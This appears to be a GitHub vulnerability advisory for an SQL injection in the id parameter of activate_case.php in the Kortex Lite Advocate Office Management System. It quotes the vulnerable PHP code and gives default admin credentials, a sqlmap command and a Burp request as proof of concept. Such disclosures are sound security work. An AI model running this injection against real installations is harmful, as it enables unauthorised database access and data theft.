Skip to content

Latest commit

 

History

History
76 lines (57 loc) · 1.81 KB

kortex-activate_case-sqli.md

File metadata and controls

76 lines (57 loc) · 1.81 KB

Kortex Lite Advocate Office Manage System

SQL Injection on /control/activate_case.php

Vendor Homepage:

https://www.sourcecodester.com/php/17280/advocate-office-management-system-free-download.html

Version:

v1.0

Tested on:

PHP, Apache, MySQL

Credentials:

http://127.0.0.1/kortex_lite/control/login.php
mayuri.infospace@gmail.com
admin

Affected Page:

/control/activate_case.php

In this scenario, the value of user input (the id parameter) is directly concatenated into an SQL query without undergoing any form of filtering or utilizing prepared statements, causing the application vulnerable to SQL injection attack

9:   $uid = $_GET['id'];
10:  $sql = "update case_stage set status=0 where id = $uid";
11:  $result = $conn->query($sql);

Proof of Concept:

Payload:

sqlmap -r request.txt --current-user --batch --dbms mysql

Burp Request:

GET /kortex_lite/control/activate_case.php?id=2 HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/kortex_lite/control/viewcase_stage.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ihtlup31vclhigou4q6if7fl1u
Connection: close

Screenshot

image